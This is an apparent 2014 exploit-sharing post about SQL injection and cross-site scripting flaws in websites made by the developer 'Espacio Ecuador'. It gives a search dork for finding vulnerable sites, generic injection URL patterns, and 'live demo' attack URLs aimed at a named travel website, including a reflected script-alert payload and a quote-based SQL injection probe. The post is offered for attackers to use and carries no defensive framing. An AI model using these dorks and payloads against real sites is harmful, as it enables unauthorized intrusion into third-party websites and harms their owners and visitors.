Friday, 4 July 2014

Espacio Ecuador XSS & SQLI

Dork:
intext:"developed by Espacio Ecuador"

Exploits:
http://site.com/*.*?id= <SQLI>
http://site.com/*.*?id= <XSS>

Live Demo:

SQLI:
http://www.galapagostraveline.com/deal.html?opc=31%27

XSS:
http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E


NEXUS - Sharing Is Caring